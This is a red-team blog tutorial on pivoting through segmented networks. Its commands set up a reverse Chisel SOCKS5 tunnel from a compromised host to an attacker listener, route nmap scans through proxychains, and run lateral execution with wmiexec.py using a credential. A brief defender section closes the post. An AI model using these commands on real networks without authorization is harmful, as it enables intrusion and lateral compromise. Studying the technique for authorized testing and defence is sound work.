Offensive Operations
MEDIUM
•
9 min read
•
October 1, 2026
•
7 views
•
0 likes
Internal Pivoting & Lateral Movement: Chaining Chisel, Proxychains & WMI Exec
#Network Pivoting
#Chisel
#Proxychains
#WMI
#Defense Evasion
Executive Synopsis
Field operations methodology for pivoting through deeply segmented enterprise perimeters. Establishing encrypted SOCKS5 tunnels over HTTP/WebSocket and orchestrating multi-hop lateral movement.
Operational Context
In modern red team assessments, dual-homed bastion hosts serve as the gateway between external DMZs and isolated internal segments. This guide outlines the execution of reliable, low-overhead SOCKS5 pivoting using Chisel and Proxychains.
---
Step 1: Deploying the Chisel Relay
On our external control listener:
# Start Chisel Server in reverse SOCKS mode
chisel server --port 8000 --reverse --socks5
On the compromised perimeter node (Linux / Windows):
# Connect back over outbound HTTP/80
./chisel client 203.0.113.50:8000 R:1080:socks
This establishes an encrypted WebSocket tunnel mapping remote SOCKS5 traffic directly to port 1080 on our attacking machine.
---
Step 2: Routing Tools Through /etc/proxychains4.conf
Configure the proxy chain configuration:
[ProxyList]
socks5 127.0.0.1 1080
Now, standard tools seamlessly operate within the internal target network:
# Port scan internal host through the tunnel
proxychains4 nmap -sT -Pn -p 22,80,445,3389 172.16.50.15
Lateral execution via WMI
proxychains4 python3 wmiexec.py CORP/svc_admin:'SecretPass'@172.16.50.15
---
Key Takeaways for Defenders
- Egress filtering is crucial: Disallow arbitrary outbound connections on unmonitored ports from perimeter systems. - Monitor for anomalous long-lived HTTP/WebSocket connections from DMZ servers.
Did this research assist your operations?
React with a like to endorse this technical walk-through and help fellow security researchers.
Authored By
Omar Adel Mahmoud
Penetration Tester & Security Researcher